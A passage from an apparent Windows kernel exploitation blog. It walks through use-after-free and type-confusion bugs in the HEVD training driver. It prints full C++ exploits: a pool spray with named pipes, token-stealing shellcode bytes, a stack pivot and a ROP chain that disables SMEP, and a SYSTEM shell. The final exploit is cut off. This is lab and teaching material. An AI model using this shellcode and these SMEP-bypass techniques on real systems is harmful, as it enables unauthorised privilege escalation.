We can see here that the object is in the nonpaged pool, but its size is 0x190, which is not quite what we are looking for. So what is going on? We are not really looking for the file object itself but for the DATA_ENTRY object that is created, which is an undocumented structure. These objects will be allocated with the tag “NpFr”. Let’s try to find it:

1: kd> !poolused 2 NpFr
Using a machine size of 1ffe4d pages to configure the kd cache
..
 Sorting by NonPaged Pool Consumed

               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 NpFr         1          112          0            0	DATA_ENTRY records (read/write buffers) , Binary: npfs.sys

TOTAL         1          112          0            0
1: kd> !poolfind NpFr -nonpaged
...

There is again exactly one, which we just allocated. Finding the exact object in memory turned out to be a bit difficult since poolfind did not manage to find it on my end. The general structure of this DATA_ENTRY object looks like this, followed by the actual data:

typedef struct _NP_DATA_QUEUE_ENTRY {
    LIST_ENTRY QueueEntry;
    ULONG DataEntryType;
    PIRP Irp;
    ULONG QuotaInEntry;
    PSECURITY_CLIENT_CONTEXT ClientSecurityContext;
    ULONG DataSize;
} NP_DATA_QUEUE_ENTRY, *PNP_DATA_QUEUE_ENTRY;

These DATA_ENTRY objects will be placed on the nonpaged pool and we can control their size, which solves part of what we are trying to achieve. The next problem we have is that when we trigger the free in the driver and create a “hole” in memory, we cannot control what is going to fill that hole. After all, the kernel is very busy and could place some other object that fits there. Even if we were faster than the kernel to allocate an object of the correct size, we would still not be guaranteed to fill the spot that we freed since heap allocations on modern Windows are randomized.

A way to get around that is to spray the heap with a lot of these holes, surrounded by allocations we control. This gives us a good chance to get our UAF object into one of those. After allocating and freeing the object via the vulnerable driver we allocate a huge amount of fake objects (fake objects being the ones we can create via AllocateFakeObjectNonPagedPool) to have a good chance to fill the exact hole the UAF object left.

To summarize:

  • Allocate a lot of DATA_ENTRY objects (CreatePipe + WriteFile)
  • Free every 2nd DATA_ENTRY object to create a lot of holes
  • Allocate the UAF object and Free it (this will likely happen in one of the holes we just created)
  • Allocate a lot of fake objects to fill every hole (including the one we have to hit to successfully exploit it)
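The four steps can be illustrated with a toy model. This is only a sketch under strong assumptions: the pool is a flat array of equally sized slots, nothing else in the system allocates, and the allocator picks a random free slot. The real Windows pool is far more complex, and the names simulate, allocate and freeSlots are invented for this example. The sprayed payload size follows the comment in CreatePipeObject (0x70 - 0x48 = 0x28).

```javascript
const CHUNK_SIZE = 0x70;          // size of the UAF chunk including its header
const DATA_ENTRY_OVERHEAD = 0x48; // header size used in CreatePipeObject()
const PIPE_PAYLOAD = CHUNK_SIZE - DATA_ENTRY_OVERHEAD; // bytes written per pipe
console.log(PIPE_PAYLOAD.toString(16)); // 28

// Toy model: returns what the dangling pointer refers to after the spray.
function simulate(slotCount, rng = Math.random) {
    const pool = new Array(slotCount).fill("pipe");        // 1. spray DATA_ENTRY objects
    for (let i = 0; i < slotCount; i += 2) pool[i] = null; // 2. free every 2nd one

    const freeSlots = () => pool.flatMap((s, i) => (s === null ? [i] : []));
    const allocate = (tag) => {
        const free = freeSlots();
        if (free.length === 0) return -1;
        const slot = free[Math.floor(rng() * free.length)]; // randomized placement
        pool[slot] = tag;
        return slot;
    };

    const uafSlot = allocate("uaf"); // 3. allocate the UAF object ...
    pool[uafSlot] = null;            //    ... and free it, the stale pointer remains

    while (allocate("fake") !== -1) {} // 4. fill every hole with fake objects
    return pool[uafSlot];
}

console.log(simulate(1000)); // fake
```

In this model the outcome does not depend on where the randomized allocator places things, because every hole ends up holding a fake object. On a live system other kernel allocations compete for the same holes, which is why the approach is only likely to succeed and not guaranteed.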

This leads us to the following code:

#include <stdio.h>
#include <Windows.h>
#include <vector>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(0xdeadc0de);
    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    return 0;
}

Running the updated PoC shows that this indeed works and places 0xdeadc0de in RIP:

Access violation - code c0000005 (!!! second chance !!!)
00000000`deadc0de ??              ???

At this point exploiting the vulnerability is exactly the same process as in the last post about the type-confusion vulnerability. We pivot the stack to a location we control and make sure it’s paged in. Then we use ROP to disable SMEP & jump to our shellcode. For details about how to do this please refer to the last post – we use exactly the same gadgets & shellcode. The updated PoC looks as follows:

#include <stdio.h>
#include <Windows.h>
#include <vector>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017
#define FAKE_OBJECT_IOCTL 0x22201F

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    BOOL res = FALSE;
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }

    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }
    return PipeHandles{ readPipe, writePipe };
}

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

int main() {
    DWORD bytesWritten;
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        Error("CreateFile");
    }

    printf("[>] Spraying objects for pool defragmentation..\n");
    std::vector<PipeHandles> defragPipeHandles;
    for (int i = 0; i < 20000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        defragPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Spraying objects in sequential allocation..\n");
    std::vector<PipeHandles> seqPipeHandles;
    for (int i = 0; i < 60000; i++) {
        PipeHandles pipeHandle = CreatePipeObject();
        seqPipeHandles.push_back(pipeHandle);
    }

    printf("[>] Creating object holes..\n");
    for (int i = 0; i < seqPipeHandles.size(); i++) {
        if (i % 2 == 0) {
            PipeHandles handles = seqPipeHandles[i];
            CloseHandle(handles.read);
            CloseHandle(handles.write);
        }
    }

    printf("[>] Allocating UAF Object\n");
    if (!DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        //Error("Allocate UAF Object");
    }

    printf("[>] Freeing UAF Object\n");
    if (!DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Free UAF Object");
    }

    printf("[>] Filling holes with custom objects..\n");    
    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode, sc, 256);

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD POP_RCX = ntBase + 0x20a386;
    QWORD MOV_CR4_RCX = ntBase + 0x3acd47;
    int index = 0;

    QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
    LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!VirtualLock(kernelStack, 0x14000)) {
        Error("VirtualLock");
    }

    RtlFillMemory((LPVOID)STACK_PIVOT_ADDR, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)STACK_PIVOT_ADDR + 0x28);

    *(rop + index++) = POP_RCX;
    *(rop + index++) = 0x350ef8 ^ 1UL << 20;
    *(rop + index++) = MOV_CR4_RCX;
    *(rop + index++) = (QWORD)shellcode;    
    
    BYTE uBuffer[0x60] = { 0 };
    *(QWORD*)(uBuffer) = (QWORD)(STACK_PIVOT_GADGET);

    for (int i = 0; i < 30000; i++) {
        if (!DeviceIoControl(hDriver, FAKE_OBJECT_IOCTL, uBuffer, sizeof(uBuffer), NULL, 0, &bytesWritten, NULL)) {
            Error("Allocate Custom Object");
        }
    }

    printf("[>] Triggering callback on UAF object..\n");
    if (!DeviceIoControl(hDriver, USE_UAF_IOCTL, NULL, NULL, NULL, 0, &bytesWritten, NULL)) {
        Error("Use UAF Object");
    }
    system("cmd.exe");
    return 0;
}

This gives us a shell as SYSTEM.

The post Windows Kernel Exploitation – HEVD x64 Use-After-Free appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Type Confusion

By: xct
10 July 2022 at 12:14

In the last post, we looked at a Stack Overflow in HEVD on Windows 11 x64. Now we are going to continue with a Type Confusion vulnerability.

Overview

Target: HEVD
OS/Arch: Windows 11 x64
Protections: ASLR, DEP, SMEP

Vulnerability Discovery

We will go over the vulnerability only briefly and focus more on the exploitation part. The source defines the following 2 objects:

typedef struct _USER_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;

typedef struct _KERNEL_TYPE_CONFUSION_OBJECT {
    ULONG_PTR ObjectID;
    union {
        ULONG_PTR ObjectType;
        FunctionPointer Callback;
    };
} KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;

On the kernel object, we see a union of an object type and a callback. Both members share the same storage, so there is only space for one of them; in other words, reading either member returns the same underlying value. The user object, on the other hand, has no such union and only contains ObjectID and ObjectType.
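
The aliasing can be checked in user mode with a small sketch. The struct names below are hypothetical stand-ins for the two HEVD types (uintptr_t replaces ULONG_PTR so the code builds outside Windows), and the helper only mimics the field-by-field copy the driver performs. It is an illustration of the layout, not driver code:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

typedef void (*FunctionPointer)();

// Hypothetical user-mode stand-ins for the two HEVD structures.
struct UserObject {
    uintptr_t ObjectID;
    uintptr_t ObjectType;
};

struct KernelObject {
    uintptr_t ObjectID;
    union {                        // both members occupy the same bytes
        uintptr_t ObjectType;
        FunctionPointer Callback;
    };
};

// Assumption of this sketch: function pointers are pointer-sized integers.
static_assert(sizeof(FunctionPointer) == sizeof(uintptr_t),
              "sketch assumes pointer-sized function pointers");
static_assert(sizeof(UserObject) == sizeof(KernelObject),
              "the union adds no extra storage");
static_assert(offsetof(KernelObject, ObjectType) == offsetof(KernelObject, Callback),
              "ObjectType and Callback start at the same offset");

// Copies the user object field by field and returns the raw bits that
// would later be interpreted as the Callback pointer.
uintptr_t callbackBitsAfterCopy(const UserObject& user) {
    KernelObject kernel{};
    kernel.ObjectID = user.ObjectID;
    kernel.ObjectType = user.ObjectType;

    uintptr_t bits = 0;
    std::memcpy(&bits, &kernel.Callback, sizeof(bits));  // read the shared storage
    assert(bits == user.ObjectType);                     // same bytes, different name
    return bits;
}
```

Calling callbackBitsAfterCopy with an ObjectType of 0x42424242 returns 0x42424242, which is exactly the value the kernel side would try to call.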

The user object structure can be passed to the driver via an IOCTL and will then be used in the following way:

NTSTATUS TriggerTypeConfusion(_In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject) {
    ...
    KernelTypeConfusionObject = (PKERNEL_TYPE_CONFUSION_OBJECT)ExAllocatePoolWithTag(
            NonPagedPool,
            sizeof(KERNEL_TYPE_CONFUSION_OBJECT),
            (ULONG)POOL_TAG
    );
    KernelTypeConfusionObject->ObjectID = UserTypeConfusionObject->ObjectID;
    KernelTypeConfusionObject->ObjectType = UserTypeConfusionObject->ObjectType;
    ...
    Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject);
    ...
}

The TypeConfusionObjectInitializer function then calls the Callback member. Because of the union, however, Callback holds the same value as the ObjectType we provided in the user object. This means that the driver will call whatever function pointer we place in the ObjectType field.

NTSTATUS TypeConfusionObjectInitializer(_In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject) {
    NTSTATUS Status = STATUS_SUCCESS;
    KernelTypeConfusionObject->Callback();
    return Status;
}

The IOCTL number for this call is 0x222023, which can be found in a similar way to the last post.

Exploitation

We start by writing a simple exploit template that defines the required structure, gets a handle to the driver, and calls the IOCTL with a dummy value:

#include <stdio.h>
#include <Windows.h>

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)0x4242424242424242;

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We set a breakpoint and then run this first version of our exploit:

0: kd> ba e1 HEVD!TypeConfusionObjectInitializer
0: kd> g
1: kd> 
HEVD!TypeConfusionObjectInitializer+0x37:
fffff804`8669754b ff5308          call    qword ptr [rbx+8]
1: kd> dq rbx+8
ffffbf8c`e5b7b248  42424242`42424242 a53058d9`e6cdbefe

We can see that the driver is trying to call our provided “B”s, which of course fails. Now that we can trigger the vulnerability, the question is which address we want to call and how that helps us elevate privileges.

Since SMEP is active, we cannot just allocate shellcode and have the driver call it, so we have to make the call to a ROP-gadget that allows us to pivot the kernel stack to a location we control. This allows us to place more ROP-gadgets there to ultimately disable SMEP & jump to our shellcode. Let’s try to find such a pivot gadget via ropper:

ropper --file ntoskrnl.exe --console --clear-cache
(ntoskrnl.exe/PE/x86_64)> search mov esp, 0x
...
0x0000000140317f70: mov esp, 0x48000000; add esp, 0x28; ret;
...

Note that not just any value will do: the new stack address should be aligned, otherwise we risk a BSOD. The gadget we found looks pretty good. The add esp instruction does not bother us much, as we can simply place some dummy values before our next gadgets. Now that we know the address our stack will be at after executing the gadget, we can allocate it and fill it with a few ROP-nops to make sure that our stack pivot is working as intended. Since ASLR is enabled, we also have to get the address the kernel is loaded at, as discussed in the last post.
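
To make the layout concrete, here is a small user-mode model of the gadget. The function names are made up for this sketch. It relies on the fact that 32-bit register writes on x64 zero-extend into the full 64-bit register, so RSP ends up at a low, user-mode address. The 8-byte alignment check is this sketch's reading of "aligned", not a documented requirement:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// RSP at the moment the gadget's final `ret` executes.
// Both `mov esp, imm32` and `add esp, imm` are 32-bit operations whose
// result is zero-extended into RSP.
uint64_t rspAtRet(uint32_t movImm, uint32_t addImm) {
    uint32_t esp = movImm;
    esp += addImm;                       // wraps at 32 bits, like the real instruction
    return static_cast<uint64_t>(esp);
}

// Bytes to place at the pivot address: padding that `add esp` skips over,
// followed by the ROP chain entries in little-endian order.
std::vector<uint8_t> buildFakeStack(uint32_t addImm, const std::vector<uint64_t>& chain) {
    assert(addImm % 8 == 0);             // keep the chain 8-byte aligned (assumption)
    std::vector<uint8_t> bytes(static_cast<size_t>(addImm), uint8_t{0x41});
    for (uint64_t entry : chain) {
        for (int i = 0; i < 8; ++i) {
            bytes.push_back(static_cast<uint8_t>((entry >> (8 * i)) & 0xFF));
        }
    }
    return bytes;
}
```

For the gadget found above, rspAtRet(0x48000000, 0x28) gives 0x48000028, which is where the first ROP entry has to live.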

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
    QWORD STACK_PIVOT_ADDR = 0x48000000;
    QWORD STACK_PIVOT_GADGET = ntBase + 0x317f70; // mov esp, 0x48000000; add esp, 0x28; ret; 
    QWORD NOP_GADGET = ntBase + 0x200042; // ret;
    int index = 0;

    LPVOID kernelStack = VirtualAlloc((LPVOID)STACK_PIVOT_ADDR, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    RtlFillMemory(kernelStack, 0x28, '\x41');
    QWORD* rop = (QWORD*)((QWORD)kernelStack + 0x28);
    
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;
    *(rop + index++) = NOP_GADGET;

    UserObject userObject = { 0 };
    userObject.ObjectID =   (ULONG_PTR)0x4141414141414141;
    userObject.ObjectType = (ULONG_PTR)STACK_PIVOT_GADGET;

    printf("[>] Stack Pivot Gadget at %llx\n", STACK_PIVOT_GADGET);
    printf("[>] New Stack at %llx\n", STACK_PIVOT_ADDR);
    getchar();

    DeviceIoControl(hDriver, 0x222023, (LPVOID)&userObject, sizeof(userObject), NULL, 0, NULL, NULL);
    
    return 0;
}

We run the updated exploit with a breakpoint on the stack pivot:

0: kd> ba e1 fffff80581f17f70
0: kd> g
Breakpoint 0 hit
nt!ExfReleasePushLock+0x20:
fffff805`81f17f70 bc00000048      mov     esp,48000000h
...

UNEXPECTED_KERNEL_MODE_TRAP (7f)
...
kb will then show the corrected stack.
Arguments:
Arg1: 0000000000000008, EXCEPTION_DOUBLE_FAULT
Arg2: ffff910032865e70
Arg3: 0000000048000000

On executing the pivot gadget we get a crash. This issue can be tricky to debug; essentially two things are going wrong. First, we need some space before and after our gadgets so the kernel can read and write there. Second, we have to make sure that the stack is actually paged in, because page faults will not be handled at this point (we are still in kernel mode). We update our PoC by adding 0x1000 bytes in front of our buffer and then use VirtualLock to force the memory to be paged in:

QWORD stackAddr = STACK_PIVOT_ADDR - 0x1000;
LPVOID kernelStack = VirtualAlloc((LPVOID)stackAddr, 0x14000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!VirtualLock(kernelStack, 0x14000)) {
    printf("Error using VirtualLock: %d\n", GetLastError());
}

Now we no longer get a crash and can run our ROP-nops!

0: kd> ba e1 fffff8046bd17f70
0: kd> g
nt!ExfReleasePushLock+0x20:
fffff804`6bd17f70 bc00000048      mov     esp,48000000h
1: kd> dq 48000000 -100
00000000`47ffff00  00000000`00000000 00000000`00000000
...
1: kd> dq 48000000
00000000`48000000  41414141`41414141 41414141`41414141
...
1: kd> t
nt!ExfReleasePushLock+0x25:
fffff804`6bd17f75 83c428          add     esp,28h
1: kd> p
nt!ExfReleasePushLock+0x28:
fffff804`6bd17f78 c3              ret
1: kd> p
nt!CmpUnlockKcbStackFlusherLocksExclusive+0x3a:
fffff804`6bc00042 c3              ret

At this point, the hardest part is over. We can now execute ROP-gadgets, which means we can repeat the exact same steps we used in our stack overflow exploit. First, we flip bit 20 in CR4 to disable SMEP and then jump to our shellcode (which is the same as before). The full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
    LPVOID drivers[512];
    DWORD cbNeeded;
    int nDrivers, i = 0;
    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        WCHAR szDrivers[512];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (wcscmp(szDrivers, drvName) == 0) {
                    return (QWORD)drivers[i];
                }
            }
        }
    }
    return 0;
}

typedef struct _UserObject {
    ULONG_PTR ObjectID;
    ULONG_PTR ObjectType;
} UserObject;

int main() {
    HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }

    LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
